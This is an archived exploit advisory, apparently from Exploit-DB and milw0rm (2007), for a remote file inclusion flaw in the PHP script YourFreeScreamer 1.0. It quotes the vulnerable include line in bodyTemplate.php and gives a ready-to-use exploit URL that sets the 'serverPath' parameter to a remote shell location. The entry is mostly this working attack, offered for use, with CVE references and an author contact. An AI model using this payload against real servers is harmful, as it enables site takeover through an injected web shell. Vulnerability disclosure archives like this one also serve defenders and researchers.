YourFreeScreamer 1.0 - 'serverPath' Remote File Inclusion

Author: Crackers_Child
type: webapps
platform: php
port: 
date_added: 2007-06-16  
date_updated:   
verified: 1  
codes: OSVDB-36891;CVE-2007-3315;CVE-2007-3271  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 4075.txt  

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Title    : YourFreeScreamer 1.0 Remote File Ä°nclude

Author   : Crackers_Child

Contact  : cybermilitan@hotmail.com

Bug      : in bodyTemplate.php " <? include ( $serverPath . "includes/form.php" );?> "

Down     : http://www.yfma.com/count/click.php?id=1
Site	 : http://yfma.com/yfs/

Exploit  : http://site.com/script_path/templates/2blue/bodyTemplate.php?serverPath=Sh3ll ?

Note     : [ Aq Mahkemelik Oldk daha ne olsn :) (ci) ] [ cRA 2 Ay YOK sAhalarda]

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

# milw0rm.com [2007-06-17]